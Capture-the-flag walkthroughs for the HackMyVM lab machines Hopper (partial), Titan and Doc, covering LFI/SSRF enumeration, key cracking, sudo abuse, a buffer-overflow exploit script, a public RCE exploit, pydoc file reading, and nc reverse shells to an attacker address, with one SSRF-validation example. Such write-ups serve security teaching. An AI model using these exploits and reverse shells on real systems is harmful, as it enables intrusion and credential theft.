|_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Enumerate port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]
```


Check /advanced-search: enter anything and click "Submit"; the URL becomes "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz for LFI.

```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"
...
000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"
```

Get usernames from passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
```

Write a Python script to enumerate local ports through the path parameter.

```python
#!/usr/bin/python3
import requests

# path.php fetches whatever URL it is given; an empty body means nothing answered on that port
for port in range(1, 65536):
    res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
    if len(res.text) == 0:
        continue
    print(f'port {port} is open.')
```

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.
```

Check port 2222.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'
<!DOCTYPE html>
<html>
<body>

<h1>[+] WARNING</h1>

<p> - Private corporative web server</p>

<p> - If you are non organization personal, leave immediately</p>

</body>
</html>
```
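
Everything from `file:///etc/passwd` onward works because path.php hands the `path` parameter to a fetcher without checking it. The function below is an added example, not the machine's code, of the validation that stops both findings: only http(s) schemes, no IP literals in loopback, private or link-local space, an explicit port set, and an allowlist of destination hosts. The allowlisted hostname is invented for the demo, and the link-local metadata address in the checks generalises beyond this box to the cloud-metadata case of the same bug.

```python
#!/usr/bin/env python3
"""Validate a user-supplied URL before a server fetches it on the user's behalf.

Added example: the guard path.php on Hopper lacks. ALLOWED_HOSTS is a
constructed allowlist for the demo.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"docs.example.com"}     # constructed: the only fetch target this app needs
ALLOWED_PORTS = {None, 80, 443}          # None means the scheme's default port


def check_fetch_target(value):
    """Return (allowed, reason) for a candidate `path` parameter."""
    parts = urlsplit(value)
    scheme = parts.scheme or "(none)"
    if parts.scheme not in ("http", "https"):
        # blocks file://, gopher://, and bare paths such as /etc/passwd
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None                        # a hostname rather than an IP literal
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local
                           or ip.is_reserved or ip.is_unspecified):
        # 127.0.0.1:2222, [::1], 10/8, 169.254.169.254 and friends stop here
        return False, f"{host} is not a public address"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    return True, "ok"


if __name__ == "__main__":
    # constructed candidates, including the two that worked against path.php
    for candidate in ("file:///etc/passwd",
                      "http://127.0.0.1:2222",
                      "http://[::1]:2222",
                      "http://localhost:2222",
                      "https://docs.example.com/guide"):
        allowed, reason = check_fetch_target(candidate)
        print(f"{'ALLOW' if allowed else 'DENY '} {candidate}: {reason}")
```

The allowlist is what actually decides; the address checks only give better error messages for the obvious cases. A hostname that passes the allowlist can still resolve to an internal address later (DNS rebinding), so the fetcher should resolve once, check the resulting IP with the same rules, and connect to that IP rather than re-resolving.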

Fuzz directories on port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222' -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...
```


There is an id_rsa key at /backup. chmod 600 it, then brute-force its passphrase.

```bash
~ /usr/share/john/ssh2john.py id_rsa > hash.txt
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
...
barcelona        (id_rsa)
```

Log in via SSH as edward.

```bash
~ ssh edward@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /home/edward/.Xauthority does not exist
edward@hopper:~$ id
uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Upload a PHP reverse shell and get a shell as www-data.

```bash
~ curl http://192.168.56.100/r.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:35698.
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
    (henry) NOPASSWD: /usr/bin/watch
```


Set the TERM environment variable, then use watch to escalate to user henry.

```bash
www-data@hopper:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
id
uid=1001(henry) gid=1001(henry) groups=1001(henry)
```
Upload id_rsa.pub to /home/henry/.ssh/, rename it to authorized_keys, and log in via SSH as henry.
```bash
~ ssh henry@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /home/henry/.Xauthority does not exist
henry@hopper:~$ id
uid=1001(henry) gid=1001(henry) grupos=1001(henry)
```
Check sudo -l.
```bash
henry@hopper:~$ sudo -l
Matching Defaults entries for henry on hopper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on hopper:
    (root) NOPASSWD: /usr/bin/ascii-xfr
```
Use ascii-xfr to create an authorized_keys for root.
```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"

0.6 Kbytes transferred at 565 CPS... Done.
```

Login as root.

```bash
~ ssh root@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /root/.Xauthority does not exist
root@hopper:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
hopper
```

HackMyVm Titan Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Titan

Scan ports first.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for chronos.local (192.168.56.100)
Host is up (0.00098s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
|   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
|_  256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80: /robots.txt is found and points to athena.txt; download it.

```bash
~ curl http://192.168.56.100/robots.txt
/athena.txt

~ wget http://192.168.56.100/athena.txt
```

Open athena.txt in vim: it contains some strange spaces and tabs.


Googling "space tab steg" shows this is whitespace steganography, which stegsnow can decode. That gives the username and password of prometheus.

```bash
~ sudo apt install stegsnow
stegsnow is already the newest version (20130616-6).
~ stegsnow -C athena.txt
prometheus/iloveallhumans
```

Log in via SSH as prometheus; there is a file named sacrifice in the home folder.

```bash
prometheus@titan:~$ ls -la
total 52
drwxr-xr-x 2 prometheus prometheus  4096 Aug 18 06:03 .
drwxr-xr-x 5 root       root        4096 Aug  9 14:23 ..
-rw------- 1 prometheus prometheus  2718 Aug 18 05:01 .bash_history
-rw-r--r-- 1 prometheus prometheus   220 Aug  9 14:23 .bash_logout
-rw-r--r-- 1 prometheus prometheus  3526 Aug  9 14:23 .bashrc
-rw-r--r-- 1 prometheus prometheus   807 Aug  9 14:23 .profile
-rwsr-sr-x 1 root       prometheus 16896 Aug  9 14:29 sacrifice
-rw------- 1 prometheus prometheus   102 Aug 18 05:51 .Xauthority
```

Decompiling sacrifice shows that it reads the answer with gets() into a 72-byte stack buffer with no length check, and that if the input is "beef" it switches to uid/gid 1000 (0x3E8) and spawns a shell.

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   char s1[72]; // [rsp+10h] [rbp-50h] BYREF   -- 72-byte stack buffer, 88 bytes below the saved return address
   int v6; // [rsp+5Ch] [rbp-4h]

   v6 = 1000;
   printf("What is your offer to the gods?");
   gets(s1);                 // no length limit: input longer than 72 bytes overwrites saved rbp and the return address
   if ( strcmp(s1, "beef") )
   {
     printf("Thanks, mortal.");
   }
   else
   {
     setuid(0x3E8u);         // 0x3E8 = 1000 = zeus; succeeds because the binary is setuid root
     setgid(0x3E8u);
     printf("Take this gift.");
     system("/bin/bash");
   }
   return 0;
 }

Now we can escalate to user zeus.

 prometheus@titan:~$ ./sacrifice
 What is your offer to the gods?beef
 zeus@titan:~$ id
 uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)

Check sudo -l.

zeus@titan:~$ sudo -l
 Matching Defaults entries for zeus on titan:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User zeus may run the following commands on titan:
     (hesiod) NOPASSWD: /usr/bin/ptx

ptx (GNU permuted index) is listed on GTFOBins: it reads whatever file it is given and prints every word back, sorted by keyword rather than in file order. With -A it appends a "file:line" reference to each entry, so the key can be reassembled even though the lines come out permuted.

```bash
zeus@titan:/home/zeus$ sudo -u hesiod ptx /home/hesiod/.ssh/id_rsa -A -G
.xx "PRIVATE/" "" "-----BEGIN OPENSSH" "" "/home/hesiod/.ssh/id_rsa:1"
.xx "PRIVATE/" "" "-----END OPENSSH" "" "/home/hesiod/.ssh/id_rsa:27"
.xx "" "" "/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER" "" "/home/hesiod/.ssh/id_rsa:16"
...
.xx "" "" "xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z" "" "/home/hesiod/.ssh/id_rsa:22"
.xx "" "" "xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg==" "" "/home/hesiod/.ssh/id_rsa:26"
```

Paste the lines into a new key file in line-number order, chmod 600 it, and log in as hesiod with the private key.

```bash
 ~ ssh hesiod@192.168.56.100 -i id_rsa
 Last login: Wed Aug 18 05:51:27 2021 from 192.168.56.150
 hesiod@titan:~$ id
 uid=1002(hesiod) gid=1002(hesiod) groups=1002(hesiod)
 hesiod@titan:~$
```

In /home/hesiod there is a file named fire. It is owned by hesiod, so we can overwrite it.

```bash
hesiod@titan:~$ ls -la
 total 56
 drwxr-xr-x 4 hesiod hesiod  4096 Aug 18 02:11 .
 drwxr-xr-x 5 root   root    4096 Aug  9 14:23 ..
 -rw------- 1 hesiod hesiod  1265 Aug 18 01:51 .bash_history
 -rw-r--r-- 1 hesiod hesiod   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 hesiod hesiod  3526 Aug  9 14:23 .bashrc
 -rwxr-x--- 1 hesiod hesiod 16608 Aug  9 14:27 fire
 drwxr-xr-x 3 hesiod hesiod  4096 Aug  9 14:25 .local
 -rw-r--r-- 1 hesiod hesiod   807 Aug  9 14:23 .profile
 drwx------ 2 hesiod hesiod  4096 Aug  9 14:31 .ssh
 -rw------- 1 hesiod hesiod   102 Aug 18 02:11 .Xauthority
```

Now here is the key point to root.

Go back to sacrifice in the disassembler and scroll up a little: there is a function named "thief" that main never calls. It does setuid(0)/setgid(0) and then system("/home/hesiod/fire").

```
.text:0000000000001185                 public thief
.text:0000000000001185 thief           proc near
.text:0000000000001185 ; __unwind {
.text:0000000000001185                 push    rbp
.text:0000000000001186                 mov     rbp, rsp
.text:0000000000001189                 mov     edi, 0          ; uid
.text:000000000000118E                 call    _setuid
.text:0000000000001193                 mov     edi, 0          ; gid
.text:0000000000001198                 call    _setgid
.text:000000000000119D                 lea     rdi, command    ; "/home/hesiod/fire"
.text:00000000000011A4                 call    _system
.text:00000000000011A9                 nop
.text:00000000000011AA                 pop     rbp
.text:00000000000011AB                 retn
.text:00000000000011AB ; } // starts at 1185
.text:00000000000011AB thief           endp
.text:00000000000011AB
.text:00000000000011AC
.text:00000000000011AC ; =============== S U B R O U T I N E =======================================
.text:00000000000011AC
.text:00000000000011AC ; Attributes: bp-based frame
.text:00000000000011AC
.text:00000000000011AC ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00000000000011AC                 public main
.text:00000000000011AC main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000000011AC
.text:00000000000011AC var_60          = qword ptr -60h
.text:00000000000011AC var_54          = dword ptr -54h
.text:00000000000011AC s1              = byte ptr -50h
.text:00000000000011AC var_8           = dword ptr -8
.text:00000000000011AC var_4           = dword ptr -4
.text:00000000000011AC
.text:00000000000011AC ; __unwind {
.text:00000000000011AC                 push    rbp
.text:00000000000011AD                 mov     rbp, rsp
.text:00000000000011B0                 sub     rsp, 60h
.text:00000000000011B4                 mov     [rbp+var_54], edi
.text:00000000000011B7                 mov     [rbp+var_60], rsi
```
Reading the two functions together gives the final method:

Overflow the gets() buffer in sacrifice so that main returns into the unreferenced function "thief". thief calls setuid(0)/setgid(0) and then system("/home/hesiod/fire"), so whatever we put in /home/hesiod/fire runs as root.

The first step is to find the offset of the saved return address. Copy sacrifice to the attacking machine and load it in gdb-peda (gdb turns ASLR off for the debugged process by default, which matters for the address used later).

Create pattern string with length 200.

```bash
 gdb-peda$ pattern create 200
 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
```

Run the program with r and, when it asks for the offer, paste the pattern.

 gdb-peda$ r
 Starting program: /home/kali/Documents/titan/sacrifice
 What is your offer to the gods?AAA%AAsA...

The program dies with a segmentation fault: the pattern has overwritten main's saved return address, so ret tries to jump to a non-canonical address made of pattern bytes. RIP still points at the ret instruction; the overwriting bytes are what RSP points to.

Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
 ...
 RSP: 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 RIP: 0x55555555524a (<main+158>:        ret)
 ...
 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
    0x55555555523f <main+147>:   call   0x555555555040 <printf@plt>
    0x555555555244 <main+152>:   mov    eax,0x0
    0x555555555249 <main+157>:   leave  
 => 0x55555555524a <main+158>:   ret    
    0x55555555524b:      nop    DWORD PTR [rax+rax*1+0x0]
    0x555555555250 <__libc_csu_init>:    push   r15
    0x555555555252 <__libc_csu_init+2>:  mov    r15,rdx
    0x555555555255 <__libc_csu_init+5>:  push   r14
 [------------------------------------stack-------------------------------------]
 0000| 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 0008| 0x7fffffffe4f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 ...
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGSEGV
 0x000055555555524a in main ()

pattern search shows the bytes at [RSP] start at offset 88 of the pattern, i.e. the saved return address is 88 bytes into the input (saved rbp at 80). This matches the decompiled layout: s1 lives at rbp-0x50, so rbp is 80 bytes past the start of the buffer and the return address 8 bytes after that. Those 8 bytes are what we overwrite with our own return address.

 gdb-peda$ pattern search
 Registers contain pattern buffer:
 RBP+0 found at offset: 80
 Registers point to pattern buffer:
 [RSP] --> offset 88 - size ~112
 [R8] --> offset 0 - size ~212
 ...

So the payload is 88 bytes of filler followed by the 8-byte address of the secret function "thief", 0x555555555185 here. That address is only valid because the binary's PIE base is not randomised: gdb disables ASLR, and the target evidently has it disabled as well (randomize_va_space=0), otherwise a hard-coded PIE address could not work. Check the disassembly to confirm the address:

```bash
gdb-peda$ disassemble 0x555555555185
Dump of assembler code for function thief:
0x0000555555555185 <+0>: push rbp
0x0000555555555186 <+1>: mov rbp,rsp
0x0000555555555189 <+4>: mov edi,0x0
0x000055555555518e <+9>: call 0x555555555080 <setuid@plt>
0x0000555555555193 <+14>: mov edi,0x0
0x0000555555555198 <+19>: call 0x555555555070 <setgid@plt>
0x000055555555519d <+24>: lea rdi,[rip+0xe64] # 0x555555556008
0x00005555555551a4 <+31>: call 0x555555555030 <system@plt>
0x00005555555551a9 <+36>: nop
0x00005555555551aa <+37>: pop rbp
0x00005555555551ab <+38>: ret
End of assembler dump.
```

x86-64 is little-endian, so the address is written low byte first: 0x555555555185 becomes "\x85\x51\x55\x55\x55\x55\x00\x00" as a Python string. The two NUL bytes are not a problem here because gets() stops only at a newline, not at NUL.

As hesiod, overwrite /home/hesiod/fire with a reverse shell one-liner and make it executable: thief runs it through system() after becoming root, and even root needs at least one execute bit set on a file to execute it.

```bash
 hesiod@titan:~$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > fire
 hesiod@titan:~$ chmod +x fire
 hesiod@titan:~$ ls -la fire
 -rwxr-x--x 1 hesiod hesiod 36 Aug 18 06:05 fire
```

Then, back as prometheus, generate the payload with python and pipe it into sacrifice. One detail is worth understanding: the filler is 87 bytes although the offset is 88. print() writes a str to stdout as UTF-8 on this box, so "\x85" is emitted as the two bytes C2 85 while the remaining bytes are ASCII and stay single bytes; the stray C2 becomes the 88th byte and the address still lands exactly on the saved return address. Writing raw bytes through sys.stdout.buffer with 88 bytes of filler avoids relying on that accident.

 prometheus@titan:~$ python3 -c 'print("a"*87+"\x85\x51\x55\x55\x55\x55\x00\x00")' |./sacrifice
 ────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:47256.
 id
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 cd /root
 id;hostname
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 titan
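The offset search and payload construction above, as an added example (my code, not the author's and not part of the original page): a cyclic pattern with unique 4-byte windows (the same idea as peda's pattern create), an offset lookup for the bytes found at [RSP], and a payload writer that emits raw bytes instead of a str through print(). THIEF_ADDR and RET_OFFSET are taken from the gdb session above; like the walkthrough, the script assumes the target's PIE base is not randomised.

```python
"""Added example: offset lookup and payload generation for the sacrifice overflow."""
import string
import struct
import sys
from itertools import islice

# Values taken from the gdb session above. The address is only meaningful because the
# PIE base is not randomised on the target (assumption carried over from the walkthrough).
THIEF_ADDR = 0x555555555185
RET_OFFSET = 88


def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence: every window of n symbols occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> str:
    """Crash pattern with unique n-byte windows (same idea as peda's 'pattern create')."""
    return "".join(islice(de_bruijn(string.ascii_lowercase, n), length))


def cyclic_find(value: str, n: int = 4, search_len: int = 4096) -> int:
    """Offset of the bytes seen at [RSP] after the crash; -1 if they are not from the pattern."""
    return cyclic(search_len, n).find(value[:n])


def build_payload(offset: int, addr: int) -> bytes:
    """offset bytes of filler, then the target address packed little-endian for x86-64."""
    return b"A" * offset + struct.pack("<Q", addr)


def encoded_length(text: str) -> int:
    """Bytes python3's print() really emits for a str on a UTF-8 stdout (why 87 filler bytes worked)."""
    return len(text.encode("utf-8"))


if __name__ == "__main__":
    # On the target: python3 overflow.py | ./sacrifice   (with the reverse shell already in fire)
    payload = build_payload(RET_OFFSET, THIEF_ADDR)
    sys.stdout.buffer.write(payload + b"\n")  # the newline is what makes gets() return
```

Run it on the target exactly like the one-liner above, piping into ./sacrifice while the listener waits; because the bytes go through sys.stdout.buffer, no encoding step sits between the script and gets().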

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bah.hmv (192.168.56.100)
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Port 80 hosts Online Traffic Offense Management System. A search finds an unauthenticated RCE for it; add doc.hmv to /etc/hosts first, since the application's base_url is http://doc.hmv/.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) 

Run the PoC to get a shell as www-data.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

That shell is not fully interactive, so spawn a proper reverse shell from it and upgrade it with a pty.

```bash
 $ nc 192.168.56.150 1234 -e /bin/bash
 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:44802.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
```

initialize.php holds the database credentials, and bella reuses the DB password for her system account.

www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 <?php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");
 ?>

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$
```

Check the listening ports: 127.0.0.1:21 is bound to loopback only and is actually SSH, so expose it with socat on a port the attacker can reach.

 ```bash
bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
 LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
 LISTEN 0      128        127.0.0.1:21        0.0.0.0:*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 [1] 571
```

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
(ALL : ALL) NOPASSWD: /usr/bin/doc
```

Disassembling /usr/bin/doc shows it just calls system("/usr/bin/pydoc3.9 -p 7890"), so sudo starts a pydoc HTTP server as root.

 ```bash
; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 nop
 pop     rbp
 retn
 ; } // starts at 1135
 main endp
```

Search for pydoc exploits; bugs.python.org issue 42988 (CVE-2021-3426) describes it: the pydoc -p web server's /getfile?key=<path> endpoint returns any file the server process can read, and here that process is root.

https://bugs.python.org/issue42988

Start the doc server with sudo; it listens on localhost:7890 as root.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit
 server>

In another terminal, SSH in as bella through the forwarded port and request root's private key from the pydoc server.

 ~ ssh bella@192.168.56.100 -p 5000      
 bella@192.168.56.100's password:
 ...
 Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
 ...
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
 qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
 LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
 ...
 s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
 uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
 -----END OPENSSH PRIVATE KEY-----

Login ssh as root.

 ~ ssh root@192.168.56.100 -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doc
 root@doc:~# 
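The socat step above forwards the loopback-only sshd to the attacker. As an added example (my code, not the author's and not part of the original page), here is a stdlib-only Python relay that does the same job when socat is not on the box. The echo server and the probe string are constructed stand-ins for sshd on 127.0.0.1:21 so the module can be exercised offline; the listen and target addresses are parameters.

```python
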